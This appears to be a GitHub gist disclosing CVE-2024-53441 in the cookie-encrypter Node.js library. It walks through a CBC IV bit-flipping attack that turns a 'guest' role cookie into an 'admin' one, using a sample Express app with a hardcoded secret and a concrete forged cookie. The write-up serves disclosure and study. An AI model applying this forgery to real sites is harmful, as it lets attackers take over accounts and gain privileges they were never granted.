mathysEthical/cookie-encrypter.md

Last active December 13, 2024 23:09

Star (1) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/mathysEthical/f45f1503f87381090e38a33c50eec971.js"></script>
Save mathysEthical/f45f1503f87381090e38a33c50eec971 to your computer and use it in GitHub Desktop.

Download ZIP

cookie-encrypted bit flip attack.

Raw

cookie-encrypter.md

cookie-encrypter Vulnerability (CVE-2024-53441)

Let's imagine a website with the following source code:

const express = require('express');
const cookieParser = require('cookie-parser');
const cookieEncrypter = require('cookie-encrypter');
const app = express();

app.use(cookieParser("NicePasswordHereItIsAGoodSecret!"));
app.use(cookieEncrypter("NicePasswordHereItIsAGoodSecret!"));
 
app.get('/login', function(req, res) {
    res.cookie("role","guest")
    res.send("logged in as guest")
})

app.get("/admin",(req,res)=>{
    console.log(req.cookies)
    if(req.cookies.role=="admin"){
        res.send("Access granted.")
    }else{
        res.send("Access denied.")
    }
})

app.listen(80)

We load /login and get a cookie as guest:

e:87c3aa62cf38214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1

We now have to XOR the IV: 87c3aa62cf38214f7c25d66eacb4c95a

We XOR it by "guest" and by "admin" to do the bit flipping attack, here is a link to help

The two new HEX strings are the HEX representations of "guest" and "admin" followed by null bytes to prevent the XOR operation repeating. Here is a link to get them

So we get the following crafted cookie:

e:81d2a278d538214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1

And now loading /admin we get: Access granted.